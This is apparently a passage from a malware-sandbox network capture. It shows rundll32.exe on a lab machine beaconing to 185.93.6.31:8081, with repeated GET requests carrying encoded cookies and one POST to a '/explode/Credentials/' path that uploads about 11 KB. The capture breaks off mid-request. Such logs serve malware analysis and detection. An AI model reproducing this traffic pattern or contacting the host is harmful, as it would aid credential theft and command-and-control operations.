              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:03.826020002 CEST7042INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:03 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              52192.168.2.749872185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:06.973078012 CEST7046OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=23bv4FeO7TBMXLwnYYLfCIC6QB5ziiY3QEdAAbyory879nI0JyVbqBTcLgZ7vdrlo9oHTv2iWJkHAu8_FBGSiNThyiK_I3Fa8MSYDrtAjKYrvBc6T1300qnPnjyIzK0EK0k2rLKs-N38n5l89LsAXyrm3OVDb9DyNgGQh3_nmg3dOZGs
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:07.000771999 CEST7046INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:06 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              53192.168.2.749873185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:10.817368031 CEST7050OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=gxJkDCZ7EKIkJ-4NaZxzxdRV0i50T4uTA_Ctvqbxa7jw-OJ9E4WUl8EtCY8cbybAro5Z5l209wiGlwXm_tdtb5m7mIu30lqiPwyijQZpqlqp2oEYt59C9oso5MUcVyj9dk1AG8MekqYd1AcKdI0VpDKjOCY-DJD6E6af4FwBu73tTy3s
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:10.845988989 CEST7050INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:10 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              54192.168.2.749874185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:13.441013098 CEST7054OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=WCtMTtXc817M75vxcjBrMY5ruhcV2aFtpwWvyQIrT5D3iLcBVOBhEQVq4WlVQCEqJ27Jene16X4VQchU7uek0YggSgI3CFs8xwJst5Bb-k_uxszlKkp54ONlRQCUVYlZLYUUN2-9dSRNG705oZ0J2iNlDVy5KYSm7FSH423k81I6hiph
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:13.469932079 CEST7054INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:13 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              55192.168.2.749875185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:13.492178917 CEST7057OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=1IRqMVh8aOFDrjn2bnBa2Y9Ixc98eKPmT7XF0LNaKv40BPflKNfeeRsuq9d0T180rCiCn_JQ3UgI8GruG-MXWdsTT_Ow0fSL_zYd37SyCXckTpLrQK9xA6Y9G-2HPijVJLuzfb1efQzzbRyt-0mFjiUUWTRMnVUjOfMVVnAVH9zSyxR9
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:13.521492004 CEST7058INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:13 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              56192.168.2.749876185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:17.146400928 CEST7061OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LCNUaYlKIMeLFt5oxq1DoHtk4kvbfrv2rMGd2wnAW91fydIYvLSk8m4cOeqzXhalAb9pg_KFx20ppjWDUeZdCjaKqO4Y42rHkD2S6KlYmj8G67F9GK5ykyQZ1KCzZhiY2XxwfmwvosOy5Tdv27wlwZ2SCEORPaCfvJevhfMwi9hCfh2J
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:17.182154894 CEST7061INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:17 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              57192.168.2.749877185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:20.946939945 CEST7065OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wvwn9k8LmOZWOPBJ6OcAiRS80a-PDsrVPdLEcZj8JChtX9y5zjcKqZ-9itHPl0qSvbmiwu1igsaPlqPsdDDPaRL3Ibqt3zCEXdUHDwqMkfd0EaddsJ0SWHmyLrgOguLht1J_j_VqHpzXzNaBO0piYrmyZuQj_u8edoPsW_czmOqgUUHZ
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:20.977343082 CEST7065INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:20 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              58192.168.2.749878185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:22.483541965 CEST7069OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=F3tSopuDUHKAUQFlrY9iSky3_Vy_h5t1jEr9Q3ClEm33-8926yjm6tjRk0S3sGenb9e6DDGv5dvLD1J92Bwvyhjsd2BzLswYPMklTHdNMeTnsap4g1BJkGXCI35EwRBG50SL7n6hRZ8wkiQ-OLa9HebrYaePYm2w-gwtxbPqJ08RNCzu
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:22.515856981 CEST7069INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:22 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              59192.168.2.749879185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:23.074126005 CEST7072OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=MwlQXZZgJPOUPNpc2YdHlGRO5n_EVL_Cs-uZ7xbqX-lA49Yso56gxnE2Pd6sdBKRHpVtt-2vw1k2jDG3TsxZPimgrNoHyW7zjxeW3LZyngsZwbVJB4R2pzsz0JSsTBysxlZ0SnMFpvetzzNbxJYh9YK4DHeOF6Sro72rsewaj-xdVBm9
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:23.149509907 CEST7073INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:23 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.749746185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:17.135066986 CEST1743OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rr1CTCJFQJw5lxGLFElypPVx7bIGQYubNYztrcljAoNOPd-YUu72BGEXg6oOdndJ1hGq4ohp9TVyyUKTYdo_JKEqZ47K6Nz2hQ81os6LIQped7qWOpZZftwEM5D9BwCoXoKbAMdnVXGJVDTQgXCt818tcUk2pH1eQ8o9KwosN6Go8jwA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:17.167481899 CEST1743INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:17 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              60192.168.2.749880185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:30.613892078 CEST7077OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VumxgtoRs1LBw-JF7B2Bag0lHnz-FXhVzdgeYzE38U22aSxWqroFyplDcGT2IoSHLkVZLHA9BvuKnbFdmY7M6ll-lEAyvC84fVvGbDbf0sSmI0lYwsKqsCRQwF4FU_NmptZozj8zpr9xAMceeSRePad5gofO8I6Qu57O5fJ4xG9Qps_O
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:30.643462896 CEST7078INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:30 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              61192.168.2.749881185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:31.003053904 CEST7081OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=cSQEdPzTu2Tl4NPLWz8jC6dk8i081ulXjgrn8yskB6reh_87fe8pKyxlqVN8T2kQDmGBQF66oUQ8ToBux-js66EvAjgeBxMG7g0kjblUsnXHyYTfA0Ux2spqDTq9WsFjBIpcDUayPR5kFPUDiJJB4ApqRWaQJsycxVvP2UTru2gTiWJb
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:31.033652067 CEST7081INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:31 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              62192.168.2.749882185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:32.096389055 CEST7085OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=njlWhztQIik5DNyGdLdBTsl-4KVpZLkYHtufNbvaWTPt09D2Dq6mHNwGOwQBRBRLs6VrbUCfxYObvDdt4_xf5ISQqgCq-WgpIieQBhtCmNG08bOTqrRwfZYD1k4BfBp2a2ZykN41oC0A_zWBaaYnLy-ICq0jJ6JxDo2ta0EqiTbwZB9n
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:32.125711918 CEST7085INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:32 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              63192.168.2.749883185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:38.280667067 CEST7088OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=v57xvjJpTq4rWiYBlYXWwWneB-fybBydQLASOeWe8mAQPQrxs1Xc4eLfXJmy9ZzawNt0ipAAVI7y9HWkCVIZIW-V9_LQvebMILfRR3fuR78Jc3EVzf_EEATQ-PBz4DSpyjCpx4gIyNSqrgDJRii0KsTQsKxenDlWC-E6E4pRTqLdM5eR
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:38.308800936 CEST7089INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:38 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              64192.168.2.749884185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:38.395628929 CEST7092OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zv9990IHfydZ1S4wdAtNH5Uz0glmA7QgVc7SFqkhPTguf-AjMqzJvwFVvBFuNEjytlOVWegryo4Si30oAZgAn8FoWDWqquNN5U0KGa7JHrE-NYUtWtRmxbxGDCudRT8TPsCku6clasrpFgtr4TKSSD9vTvJW5kLlI4gCkGpuCBrIsAO7
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:38.424730062 CEST7092INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:38 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              65192.168.2.749885185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:40.243335962 CEST7096OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=a3l4b84QDMHMTPJugfdvpjw-zk2cJJfw65ux3U6ad9sYk_4e--6I9ClGFez0BDqjRuVFhbXf62tu_BmFFrxxDHHQhOhfuUbB12e-7u4CtjlBsZ17X_RelWND-Kb0PDSeniZceCt1jsX1vxtpnOYJx9rIJEXWZ4yZ-82Dg7Rqp94FJDGP
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:40.273215055 CEST7096INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:40 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              66192.168.2.749886185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:43.956024885 CEST7100OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wazc5UxbY_VVaAta67f7mhfsKryMXjHGPoI_Ypus3ztuDyeqzWfxupztccLMx7GBvulZ0e4yedWMxlj_d2A0ehGn2qmuj8uXXoX8HAncauR3QVxOs83pS3ri1asN0hnytAKEnPY65Y_UnC2SOBqZcbrinfcgrhQNddMXSPRjY_mjAbrK
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:43.987164021 CEST7100INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:43 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              67192.168.2.749887185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:44.589997053 CEST7103OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xHFrq0iJaXtTWzhsfoVbQ5-9xFVsjaJ8X0DESqOvK2Qk8fZ_OCLf4wvbqk1kul6uvN2DBeKl3NIYBWt0CxYWw8vmTmmgJPUR78McRaRHCO00u5NxUFpwmbbIGneXyylPNE6y562rfJbjmB0367yEFDXhWK5caFS5KQYUzGDgHkbCPhXn
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:44.619774103 CEST7104INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:44 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              68192.168.2.749888185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:46.909986973 CEST7107OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fb4kWdjXUPfai65YlzAzkCr5knuK48vG_Vzt61hdK-0OVKIo7SnUwj-BSdriw2aVUCIZs6MYt114O0WzAHstOmcX2N5Jfhr3waDi2PjF6g9XdsFNSTMCo3WEpJDi-2ioiOEATj2y0vPjeEdfiiFV8cwPeHPAoNCv7QrftaKt--gT4225
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:46.939848900 CEST7108INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:46 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              69192.168.2.749889185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:50.594907045 CEST7111OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qy64ZifWurY8BOuhEdqIjvDiF5gD0nGxMB8Xh8zw-KlLriWyV30MLmSEeYAL5Y1j04JQyI36Dx93Wri5ZEnFDqS5naTPeybcgJzPiMsY2yBb5EC8PwWjVNmXybr4lPqCWxFhKsL0r1uMx876hONX2Vq-i2MzN4d0RlnHAQ-_zYutYcYq
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:50.623229980 CEST7111INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:50 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.749747185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:17.335114002 CEST1746OUTPOST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11120
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:17.363569021 CEST1758INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:17 GMT
              Server: cloudflare
              Content-Length: 2119
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              70192.168.2.749890185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:51.737193108 CEST7115OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=r_odTyINol87PsrwheE6MHm66xbiCPBsUNT-yPX6HpEAWeYAozEwEPK7sGiikXAr0L-Ye4BkuH_ikJlVGTb10H_xGwPA2Qo9MNM9tmeKq04ZF53k3Zso4RS0FAFjhNhY2lRFNphsJCW6yuw4VkxY29S0XF1O-NWnG4XW4po1olPNV3tg
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:51.765187979 CEST7115INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:51 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              71192.168.2.749891185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:56.501699924 CEST7119OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
